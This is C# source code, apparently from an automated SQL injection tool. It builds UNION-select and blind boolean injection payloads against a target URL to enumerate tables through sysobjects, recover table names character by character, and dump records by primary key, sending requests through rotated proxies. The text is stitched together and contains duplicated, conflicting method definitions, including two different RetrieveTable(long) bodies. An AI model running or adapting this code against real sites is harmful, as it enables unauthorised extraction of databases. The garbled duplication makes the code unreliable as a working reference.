private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
GlobalDS.Table retVal = new GlobalDS.Table();
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
string ResultPage, ResultText;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = ResultText.Split(':');
retVal.Name = values[0];
retVal.ObjectID = Convert.ToInt64(values[1]);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (ResultText.Length > 0)
{
ResultText = ResultText.Substring(1, ResultText.Length - 1);
retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
}
else
{
retVal.RecordCount = -1;
}
return(retVal);
}
private void WriteFieldToXml(ref XmlTextWriter xOutput, GlobalDS.Table Tbl)
{
for (int i = 0; i < Tbl.FieldCount; i++)
{
xOutput.WriteStartElement("field");
xOutput.WriteStartAttribute("id", null);
xOutput.WriteString((i + 1).ToString());
xOutput.WriteEndAttribute();
xOutput.WriteStartAttribute("name", null);
xOutput.WriteString(Tbl.FieldList[i].FieldName);
xOutput.WriteEndAttribute();
xOutput.WriteStartAttribute("datatype", null);
xOutput.WriteString(Tbl.FieldList[i].DataType.ToString());
xOutput.WriteEndAttribute();
if (Tbl.FieldList[i].IsPrimary)
{
xOutput.WriteStartAttribute("primary", null);
xOutput.WriteString(true.ToString().ToLower());
xOutput.WriteEndAttribute();
}
xOutput.WriteEndElement();
}
}
/// <summary>
/// Retrieves the table schema of an injected database
/// </summary>
/// <param name="TableData">The table data this should be stored into</param>
public void PopulateTableStructure(ref GlobalDS.Table TableData)
{
int FieldCount;
FieldCount = GetFieldCount(TableData.ObjectID);
for (int i = 0; i < FieldCount; i++)
{
TableData.AddField(GetFieldData(TableData.ObjectID, i));
}
}
// }}}
// {{{ PullDataFromIndividualTable
private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
List <Hashtable> retVal = new List <Hashtable>();
long RecordCounter = 0;
GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
int ColumnCounter = 0;
string PrimaryKeyName = String.Empty;
SqlDbType PrimaryKeyType = SqlDbType.Int;
UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
// Generate Field List
for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
{
UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
{
ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
ColumnCounter++;
}
if (SrcTable.FieldList[FieldCounter].IsPrimary)
{
PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
}
}
if (PrimaryKeyName.Length > 0)
{
for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
{
CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
retVal.Add(Record);
OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
}
}
return(retVal);
}
private void TableChanged(GlobalDS.Table ChangedTable)
{
PartialTable = ChangedTable;
}
private void DeserializeSchemaXml(XmlNode TargetNode)
{
// Init member vars
_Username = ""; _AllTablesRetrieved = true;
if (TargetNode.Attributes["username"] != null)
{
_Username = TargetNode.Attributes["username"].InnerText;
}
if (TargetNode.Attributes["tablesfinished"] != null)
{
_AllTablesRetrieved = bool.Parse(TargetNode.Attributes["tablesfinished"].InnerText);
}
XmlNodeList Tables = TargetNode.SelectNodes("table");
if (Tables.Count > 0)
{
List <GlobalDS.Table> TableList = new List <GlobalDS.Table>();
foreach (XmlNode ExtractedTable in Tables)
{
GlobalDS.Table ThisTable = new GlobalDS.Table();
if (ExtractedTable.Attributes["name"] != null && ExtractedTable.Attributes["id"] != null)
{
ThisTable.Name = ExtractedTable.Attributes["name"].InnerText;
ThisTable.ObjectID = System.Int32.Parse(ExtractedTable.Attributes["id"].InnerText);
if (ExtractedTable.Attributes["recordcount"] != null)
{
ThisTable.RecordCount = System.Int64.Parse(ExtractedTable.Attributes["recordcount"].InnerText);
}
XmlNodeList Fields = ExtractedTable.SelectNodes("field");
foreach (XmlNode ExtractedField in Fields)
{
GlobalDS.Field ThisField = new GlobalDS.Field();
if (ExtractedField.Attributes["name"] != null)
{
ThisField.FieldName = ExtractedField.Attributes["name"].InnerText;
}
if (ExtractedField.Attributes["datatype"] != null)
{
ThisField.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), ExtractedField.Attributes["datatype"].InnerText);
}
if (ExtractedField.Attributes["primary"] != null)
{
try
{
ThisField.IsPrimary = bool.Parse(ExtractedField.Attributes["primary"].InnerText);
}
catch (System.FormatException)
{
ThisField.IsPrimary = false;
}
}
ThisTable.AddField(ThisField);
}
TableList.Add(ThisTable);
}
}
_DBTables = TableList.ToArray();
}
}
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
GlobalDS.Table retVal = new GlobalDS.Table();
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
string ResultPage, ResultText;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = ResultText.Split(':');
retVal.Name = values[0];
retVal.ObjectID = Convert.ToInt64(values[1]);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (ResultText.Length > 0)
{
ResultText = ResultText.Substring(1, ResultText.Length - 1);
retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
}
else
{
retVal.RecordCount = -1;
}
return retVal;
}
private GlobalDS.Table RetrieveTable(long TableID)
{
GlobalDS.Table RetVal = new GlobalDS.Table();
StringBuilder NameBuilder = new StringBuilder();
StringBuilder CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.TableNameLength(TableID)));
long Size = RecursiveSearch(1,0,CurrentVector.ToString());
lock(this)
{
UnsafeCharArray = new char[Size];
CharsLeft = Size;
Thread.Sleep(1000);
WaitCallback myCallback = new WaitCallback (ThreadedRecursiveCharacterSearch);
for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
{
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.TableNameCharacterValue(AscCounter, TableID)));
if (_Options.Throttle >= 0)
{
Thread.Sleep(1000);
NameBuilder.Append(Convert.ToChar(RecursiveSearch(1, UNICODE_LIMIT, CurrentVector.ToString())));
}
else
{
ThreadedText ttx = new ThreadedText((int)AscCounter - 1, CurrentVector.ToString());
ThreadPool.QueueUserWorkItem (myCallback, ttx);
}
}
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.NumberOfRecords(NameBuilder.ToString())));
long TableRecordCount = RecursiveSearch(1,0, CurrentVector.ToString());
RetVal.ObjectID = TableID;
RetVal.RecordCount = TableRecordCount;
// RetrievePrimaryKey(TableID);
string TableName;
if (_Options.Throttle >= 0)
{
TableName = NameBuilder.ToString();
}
else
{
while(CharsLeft > 0)
{
Thread.Sleep(1000);
}
TableName = new String(UnsafeCharArray);
}
RetVal.Name = TableName;
}
return RetVal;
}
private long[] GetTableIDs(long[] ExistingIDs)
{
List<long> retVal;
if (ExistingIDs != null)
retVal = new List<long>(ExistingIDs);
else
retVal = new List<long>();
long TableCount = GetNumberOfTablesInDatabase();
StringBuilder CurrentVector = new StringBuilder();
long ThisID = 0;
long LastID = 1;
int StartingPoint = ExistingIDs == null ? 0 : ExistingIDs.Length;
for (int i = StartingPoint; i < TableCount; i++)
{
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.NextLowestTableID(ThisID)));
ThisID = RecursiveSearch(LastID,0,CurrentVector.ToString());
GlobalDS.Table tbl = new GlobalDS.Table();
tbl.ObjectID = ThisID;
LastID = ThisID;
tbl.Name = string.Empty;
TableChanged(tbl);
retVal.Add(ThisID);
}
return retVal.ToArray();
}
private void DeserializeSchemaXml(XmlNode TargetNode)
{
// Init member vars
_Username = "";_AllTablesRetrieved = true;
if (TargetNode.Attributes["username"] != null)
{
_Username = TargetNode.Attributes["username"].InnerText;
}
if (TargetNode.Attributes["tablesfinished"] != null)
{
_AllTablesRetrieved = bool.Parse(TargetNode.Attributes["tablesfinished"].InnerText);
}
XmlNodeList Tables = TargetNode.SelectNodes("table");
if (Tables.Count > 0)
{
List<GlobalDS.Table> TableList = new List<GlobalDS.Table>();
foreach (XmlNode ExtractedTable in Tables)
{
GlobalDS.Table ThisTable = new GlobalDS.Table();
if (ExtractedTable.Attributes["name"] != null && ExtractedTable.Attributes["id"] != null)
{
ThisTable.Name = ExtractedTable.Attributes["name"].InnerText;
ThisTable.ObjectID = System.Int32.Parse(ExtractedTable.Attributes["id"].InnerText);
if (ExtractedTable.Attributes["recordcount"] != null)
{
ThisTable.RecordCount = System.Int64.Parse(ExtractedTable.Attributes["recordcount"].InnerText);
}
XmlNodeList Fields = ExtractedTable.SelectNodes("field");
foreach (XmlNode ExtractedField in Fields)
{
GlobalDS.Field ThisField = new GlobalDS.Field();
if (ExtractedField.Attributes["name"] != null)
{
ThisField.FieldName = ExtractedField.Attributes["name"].InnerText;
}
if (ExtractedField.Attributes["datatype"] != null)
{
ThisField.DataType = (System.Data.SqlDbType) System.Enum.Parse(typeof(System.Data.SqlDbType),ExtractedField.Attributes["datatype"].InnerText);
}
if (ExtractedField.Attributes["primary"] != null)
{
try
{
ThisField.IsPrimary = bool.Parse(ExtractedField.Attributes["primary"].InnerText);
}
catch (System.FormatException)
{
ThisField.IsPrimary = false;
}
}
ThisTable.AddField(ThisField);
}
TableList.Add(ThisTable);
}
}
_DBTables = TableList.ToArray();
}
}